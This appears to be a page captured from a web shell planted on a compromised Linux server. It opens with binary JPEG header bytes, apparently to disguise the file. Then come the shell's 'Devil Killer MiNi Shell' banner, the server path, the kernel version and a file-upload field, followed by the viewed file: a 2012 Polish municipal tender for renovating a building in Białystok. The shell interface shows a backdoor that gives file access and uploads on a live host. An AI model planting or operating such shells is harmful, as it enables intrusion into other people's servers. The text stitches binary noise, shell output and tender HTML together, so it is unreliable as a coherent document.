JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/77705-N-2012.html

<p class="kh_header"><b>Białystok: WYKONANIE REMONTU CZĘŚCI PODPIWNICZENIA I CZĘŚCI PARTERU BUDYNKU PRZY  UL. STORCZYKOWEJ 7 W BIAŁYMSTOKU NA DZIAŁCE O NR EWIDENCYJNYM DZIAŁKI 3155/2  W OBRĘBIE EWIDENCYJNYM 6.</b><br>
<b>Numer ogłoszenia: 77705 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE REMONTU CZĘŚCI PODPIWNICZENIA I CZĘŚCI PARTERU BUDYNKU PRZY  UL. STORCZYKOWEJ 7 W BIAŁYMSTOKU NA DZIAŁCE O NR EWIDENCYJNYM DZIAŁKI 3155/2  W OBRĘBIE EWIDENCYJNYM 6..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie remontu części podpiwniczenia i części parteru budynku przy              ul. Storczykowej 7 w Białymstoku na działce o nr ewidencyjnym działki 3155/2 w obrębie ewidencyjnym 6 - zgodnie z dokumentacją projektową (szkicami,rysynkami i przedmiarami robót) i specyfikacjami technicznymi wykonania i odbioru robót budowlanych. Szczegółowy opis przedmiotu zamówienia został podany w załączniku nr 1 do SIWZ Opis przedmiotu zamówienia.
1.	Zakres prac (branża budowlana) jest następujący:
1)	roboty budowlane na parterze budynku polegające na:
- rozebraniu części ścianek działowych i wybudowania nowych ścianek, założenia nowych nadproży,  wymianie na nowe ościeżnic drzwiowych;
- zamontowanie przewodów instalacji wentylacji wymuszonej wraz z ich obudową; 
- tynkowanie nowych ścianek, licowanie ścian płytkami glazurowanymi, przecieranie, malowanie, powierzchni ścian, sufitów i innych elementów;
- zerwanie posadzek cementowych,  posadzek z tworzyw sztucznych i z płytek na zaprawie cementowej, wykonanie warstw wyrównawczych pod posadzki, wykonanie izolacji z folii 
w płynie, wykonanie posadzek z wykładziny rulonowej i z płytek ceramicznych;
- zakup i zamontowanie nowych drzwi płycinowych wewnętrznych i drzwi aluminiowych zewnętrznych oraz jednego okienka z PCV;
- wykonanie i zamontowanie kraty siatkowej oddzielających hall od klatki schodowej, zakup 
i zamontowanie poręczy w łazience dla osób niepełnosprawnych;
- wywóz i utylizacja odpadów.;
2)	roboty budowlane pomieszczeń nr 11 i nr 13 w podpiwniczeniu budynku polegające na:
- rozebraniu fragmentów ścianek działowych, zamurowaniu otworu drzwiowego, założenia nowego nadproża, wbudowaniu  ościeżnicy drzwiowej;
- tynkowanie nowych ścianek, licowanie ścian płytkami glazurowanymi, przecieranie, malowanie, powierzchni ścian, sufitów i innych elementów;
- zerwanie   posadzek   cementowych,   posadzek   z   tworzyw   sztucznych  i  posadzek  
z płytek na zaprawie cementowej, wykonanie warstw wyrównawczych pod posadzki, wykonanie izolacji z folii w płynie, wykonanie posadzek z płytek ceramicznych;
- zakup i zamontowanie nowych drzwi płycinowych wewnętrznych;
- wywóz i utylizacja odpadów;
roboty elektryczne:
Zakres przedmiotu zamówienia- branża elektryczna :
-  demontaż starego osprzętu, i przewodów elektrycznych,
-  wykucie bruzd dla przewodów wtynkowych,
-  wykonanie nowych gniazd wtykowych  i połączenie ich z istniejąca instalacją,
-  montaż systemu przyzywowego w łazience dla osób niepełnosprawnych,
-  wymiana źródeł światła i istniejących oprawach oświetleniowych,
-  wymiana rozdzielni zasilającej,
-  montaż osprzętu elektroinstalacyjnego, 
-  uruchomienie instalacji elektrycznej, sprawdzenie i pomiary ,
 Przewody elektryczne: 
- YDYp - 3x1,5 - 450/750 V 
-  YDYp - 3x2,5 - 450/750 V
- YDYp - 4x1,5 - 450/750 V
- YTKSY 4x2x0,5 mm2     
- YDY - 5x2,5 - 450/750 V 
Osprzęt elektroinstalacyjny: 
- Gniazda podwójne z uziem. p/t , IP-20
- Gniazdo 2-bieg.pojedyncze z uziem. IP 44
- Gniazdo telefoniczne RJ-12 pojedyncze wt
- Gong 250V dwutonowy. IP-20
- Łącznik 1-bieg.p/t 250V/10A z .IP-20
- Łącznik świecz.p/t 250V/10A z .IP-20
- Oprawa y oświetleniowe 
- Przycisk p/t dzw-św. 250V/10A st.p.IP-20
Rozdzielnice natynkowe - z tworzywa sztucznego, do montażu aparatury modułowej, wyposażone w konstrukcje wsporcze i szyny montażowe TH-35, listwy przyłączowe N i PE, klasa ochronności II, znamionowe napięcie izolacji: 500V, znamionowe napięcie łączeniowe 230/400V.
roboty sanitarne:
a)	pomieszczenie nr 1:
- demontaż 2 zlewów z bateriami i odpływami kanalizacyjnymi;
- montaż zlewozmywaka 2 -komorowego z syfonem z baterią stojącą z zaworkami do baterii;
- przeróbka podejść wodociągowych ( w bruździe ściennej ) i kanalizacyjnego;
- montaż wodomierza wody ciepłej;
b)	pomieszczenie nr 2:
- demontaż rurociągu gazowego;
- demontaż kratki ściekowej z podejściem;
- montaż zlewozmywaka 2 -komorowego z syfonem z baterią stojącą z zaworkami do baterii;
- przeróbka podejść wodociągowych w bruździe ściennej w izolacji  i podejścia kanalizacyjnego;
c)	pomieszczenie nr 3:
- wentylator ścienny elektryczny do otworu 14x14 cm;
d)	pomieszczenie nr 4:
- wentylator ścienny elektryczny do otworu 14x14 cm;
e)	pomieszczenie nr 6:
- wentylator ścienny elektryczny do otworu 14x14 cm;
f)	WC męski:
- demontaż zlewu z baterią  i odpływu kanalizacyjnego;
- Przeróbka instalacji wod-kan z podejściami do przyborów sanitarnych z przewodami wodnymi w izolacji w bruzdach ściennych z wcięciem do pionu kanalizacyjnego;
- montaż umywalki z baterią stojącą z zaworkami do baterii i miski ustępowej kompaktowej;
- montaż zaworu czerpalnego;
- montaż wodomierza wody ciepłej  z drzwiczkami metalowymi osłonowymi;
- montaż wentylatora ściennego elektrycznego dn 100 mm uruchamianego wyłącznikiem światła;
g)	WC damski + NP:
- demontaż umywalki z baterią i miski ustępowej  z odpływami kanalizacyjnymi;
- demontaż zaworu czerpalnego;
- demontaż kratki ściekowej  z podejściem;
- demontaż grzejnika żeliwnego 3 elementowego  (zawór termostatyczny do odzyskania);
- przeróbka instalacji wod-kan z podejściami do przyborów sanitarnych z przewodami wodnymi w izolacji w bruzdach ściennych;
- montaż umywalki dla NP z baterią stojącą z przedłużonym uchwytem  i miski ustępowej kompaktowej dla NP;
- montaż wodomierza wody ciepłej  z drzwiczkami metalowymi osłonowymi;
- montaż grzejnika płytowego o mocy ok. 300 W - zawór grzejnikowy  z demontażu z przeróbką rur przyłącznych;
- montaż wentylatora ściennego elektrycznego dn 100 mm uruchamianego wyłącznikiem światła;
h)	Korytarz:
- wymiana hydrantu dn 50 mm wnękowego na hydrant dn 25 mm z kompletnym wyposażeniem  i z badaniem wydajności;
- przeróbka rur stalowych instalacji co - ukrycie w ścianie z wymianą na rury z tworzyw;
Pomieszczenia wspólne w piwnicy:
a)	magazyn:
- demontaż  zlewu z baterią i odpływem kanalizacyjnym;
- demontaż wodomierza - przeniesienie do pomieszczenia WC;
- wymiana i uzupełnienie izolacji na rurociągach instalacji co;
b)	pomieszczenie WC:
- demontaż umywalki z baterią i miski ustępowej z odpływami kanalizacyjnymi;
- demontaż brodzików z bateriami , podejściami wod-kan - 2 kpl;
- demontaż zbędnych rurociągów instalacji wod-kan;
- przeróbka instalacji wod-kan z podejściami do przyborów sanitarnych 
z przewodami wodnymi w izolacji w bruzdach ściennych;
- montaż umywalki z zaworem wypływowym i miski ustępowej kompaktowej;
- montaż wodomierza wody zimnej - z demontażu na potrzeby aktualnego najemcy - Sopel;
- montaż dodatkowego wodomierza wody zimnej;
- montaż wentylatora ściennego elektrycznego dn 100 mm uruchamianego wyłącznikiem światła;
- przeróbka trasy rurociągów instalacji co;
c)	korytarz:
- odcięcie istniejących rurociągów  instalacji cwu od pozostałych najemców;
- przeróbka instalacji wody zimnej w celu zasilania pojedynczym odgałęzieniem pomieszczeń WTZ na piętrze z montażem wodomierza wody zimnej i podłączeniem dotychczasowych odgałęzień  z wymianą zaworów na kulowe;
- montaż dodatkowego wodomierza wody zimnej  na potrzeby najemcy - Szklarz;
- izolacja rurociągów instalacji wodnej z uzupełnieniem izolacji rurociągu wody zimnej zasilającego budynek;
d)	pomieszczenie węzła:
- montaż rurociągów instalacji cwu z rur st. podwójnie ocynk. lub alternatywnie z rur z tworzyw z wkładką ALU z izolacją i armaturą odcinającą i regulacyjną na potrzeby pomieszczeń WTZ;
- montaż zaworu regulacyjnego na instalacji cwu zasilającej budynek przychodni      
ul. Storczykowa 5;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.12.20-6, 45.26.25.00-6, 45.26.26.00-7, 45.32.40.00-4, 45.42.10.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.31.10.00-0, 45.33.00.00-9, 45.33.20.00-3, 45.33.24.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości: 2.500,00  zł  (słownie: dwa  tysiące pięćset  złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego do oferty oświadczenia (załącznik nr 3 do SIWZ), metodą spełnia/nie spełnia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca winien udokumentować, że posiada wiedzę i doświadczenie poprzez wykazanie, iż:
a)	 wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zamówienia polegające na  wykonaniu prac remontowych wykończeniowych o wartości minimum po 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy zł). Wykonane zamówienia winny być poparte dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego do oferty wykazu wykonanych robót, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego do oferty oświadczenia (załącznik nr 3 do SIWZ), metodą spełnia/nie spełnia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia w/w warunek  w przypadku, gdy przedstawi wykaz co najmniej 2 osób wyznaczonych do realizacji  niniejszego zamówienia tj:
- kierownikiem budowy, który będzie uczestniczyć w wykonywaniu zamówienia, posiadającym uprawnienia budowlane  w zakresie  konstrukcyjno-budowlanym 
oraz kierownikiem robót elektrycznych  w specjalności instalacyjnej w zakresie  instalacji i urządzeń  elektrycznych  i elektroenergetycznych
lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa,
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, metodą spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunku zostanie dokonana przez zamawiającego na podstawie załączonego do oferty oświadczenia (załącznik nr 3 do SIWZ), metodą spełnia/nie spełnia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.	Wykonawca, który wykazuje spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów:
1)	wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp).
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w rozdziale VI SIWZ pkt 3 ppkt 1 i 2, 
2)	dokumenty określone w rozdziale VI SIWZ pkt 2 ppkt 1, 2 i 3 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
7.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ  
2)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 
ustawy Pzp,
3)	podpisany przez Wykonawcę uproszczony kosztorys ofertowy (zawierający ilość robot, cenę jednostkową oraz wartość pozycji sporządzony na podstawie dokumentacji projektowej i Specyfikacji Technicznej Wykonania i Odbioru Robót). Zestawienie zawierające wykaz procentowy wskaźników cenotwórczych; koszty ogólne, koszty zakupu, zysk i stawkę roboczogodziny.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Strony dopuszczają  możliwość przedłużenia terminu, o których mowa w ust. 1 o czas opóźnienia, jeżeli          takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących       przypadkach:
1)	wystąpienia robót dodatkowych, awaryjnych, zamiennych itp., których wykonanie wiąże się 
z koniecznością wydłużenia czasu realizacji zamówienia,
2)	wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny,
3)	działania siły wyższej, tzn. zjawisk mających charakter nagły, gwałtowny, nieprzewidywalny 
(np. powódź, huragan, trzęsienie ziemi, działania i zamieszki wojenne, ataki terrorystyczne, ekonomiczne następstwa globalnego kryzysu finansowego),
4)	przerwania lub zawieszenia robót przez Zamawiającego z przyczyn niezawinionych przez Wykonawcę,
5)	zamówień dodatkowych.
2.	Dopuszcza się zmianę wynagrodzenia określonego w ust. 1 w następujących przypadkach:
1)	wystąpienia robót dodatkowych 
Jeżeli w toku realizacji robót wystąpi konieczność wykonania robót dodatkowych (nieujętych 
w przedmiarze robót ), wykonawca zobowiązany jest je wykonać przy jednoczesnym zachowaniu wskaźników cenotwórczych jak przy obliczaniu kosztorysu ofertowego do przetargu, przy uwzględnieniu danych  wyjściowych do kosztorysowania (stawka r-g, wskaźnik kosztów pośrednich i zysku, ceny materiałów, ceny sprzętów); w przypadku braku cen materiałów i sprzętu nieujętych w kosztorysie ofertowym według średnich stawek i cen podawanych w wydawnictwach SEKOCENBUD (tabela dla regionu podlaskiego) z kwartału poprzedzającego realizację robót, 
a w przypadku ich braku wg cen udokumentowanych i uzgodnionych z Zamawiającym.
W przypadku wystąpienia robót dodatkowych zamawiający i wykonawca każdorazowo sporządzą protokół konieczności. Bez zatwierdzenia protokołu konieczności przez zamawiającego wykonawca nie może rozpocząć wykonywania robót dodatkowych.
W przypadku zmiany zakresu rzeczowego zamówienia wykonawca zobowiązany będzie do przedłożenia kosztorysu powykonawczego wraz ze zgłoszeniem zakończenia robót.
2)	wystąpienia robót zamiennych:
Podstawą określenia wynagrodzenia za roboty zamienne będzie protokół konieczności uzgodniony przez przedstawicieli stron oraz kosztorysy sporządzone przez Wykonawcę metodą kalkulacji szczegółowej, zawierające zakres robót według technologii przyjętej w kosztorysie ofertowym, stanowiącym podstawę obliczenia ceny w ofercie oraz zakres robót podlegających na wykonaniu wg nowej technologii, z uwzględnieniem danych wyjściowych do kosztorysowania (stawka r-g, wskaźnik kosztów pośrednich i zysku, ceny materiałów, ceny sprzętów); w przypadku braku cen materiałów i sprzętu nieujętych w kosztorysie ofertowym według średnich stawek i cen podawanych w wydawnictwach SEKOCENBUD (tabela dla regionu podlaskiego) z kwartału poprzedzającego realizację robót, a w przypadku ich braku wg cen udokumentowanych i uzgodnionych 
z Zamawiającym,
3)	rezygnacji z realizacji części robót:
Podstawą określenia wynagrodzenia za zaniechany zakres robót będzie uzgodniony kosztorys sporządzony przez Wykonawcę metodą kalkulacji uproszczonej, zawierający pozycje dla robót zaniechanych z kosztorysu ofertowego Wykonawcy,
4)	zmiany stawki podatku VAT wynikająca z obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego  15-370 Białystok  ul.gen. J. Bema  89/1 -pok. 111.</p>
